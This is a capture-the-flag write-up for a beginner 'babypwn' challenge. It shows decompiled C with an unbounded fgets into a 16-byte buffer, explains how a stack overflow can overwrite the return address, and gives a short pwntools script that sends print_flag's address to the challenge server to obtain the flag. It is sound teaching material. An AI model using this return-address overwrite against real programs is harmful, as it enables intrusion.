### babypwn

This CTF begins with a program file and a place to connect to.

Connecting to it shows its text to be:
```
Please Enter Text
a    
Try again! Control Flow Returned to main()
```
With the 'a' being user input, the phrase "control flow returned to main()" hints at the solution of to ctf.

Opening the program in ghidra shows that the program mostly functions around a function called user_input() whose code is as follows:
```c
void user_input(void)
{
  char local_18 [16];
  
  puts("Please Enter Text");
  local_18._0_8_ = 0;
  local_18._8_8_ = 0;
  fgets(local_18,200,stdin);
  return;
}
```

There is also a function called print_flag() however it is never called in the normal operation of the program.

We can force it to be called by a hole left in the user_input() function for us. fgets puts its data into a 16 byte string, but it can except more than 16 bytes of data. The extra data will overflow and overwrite other parts of the stack frame. The part that is important for us today is the return address. After a function, in our case user_input() is finished the program needs to return to where it was called, which is what the return address stores.
If we overwrite the return address with the address of print_flag() the function will do that intead of returning to main.

This can be put into action with pwn tools:
```python
e = ELF("babypwn")
addr = e.symbols["print_flag"]
addr64 = p64(addr)

p = remote("chal.ctf-league.osusec.org", 4747)
p.recv()
p.sendline(addr64*4)
print(p.recv())
```
First using the ELF.symbols() function get the address of the function, then sending 4 copies of it into the user input. The first ones fill up the variable, allowing the next ones to be written into the return address.

Using remote.recv() to get what the program is now outputting gives us the flag: osu{c0ngr4tz_on_F1r5T_pwn}

